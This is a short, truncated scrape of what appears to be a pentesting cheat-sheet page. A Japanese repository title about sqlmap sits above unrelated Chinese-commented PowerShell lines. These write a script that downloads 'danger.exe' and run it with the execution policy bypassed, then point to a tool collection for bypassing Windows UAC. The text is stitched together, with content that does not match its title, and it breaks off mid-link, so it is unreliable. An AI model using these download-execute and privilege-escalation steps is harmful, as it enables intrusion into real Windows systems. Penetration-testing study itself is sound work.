cheat sheet for penetration testing (Japanese) 🐉 - MY_CHEAT_SHEET/enumeration/sqlmap.md at master · sanposhiho/MY_CHEAT_SHEET
echo$client.DownloadFile($targetlocation,"danger.exe") >> script2.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1# 使用预编译的二进制文件绕过 UAC:https://github.com/hfiref0x/UACME# 使用 powershell 脚本上传 https://github.com/hfiref0x/UACME/blob/master/Compiled/Akag...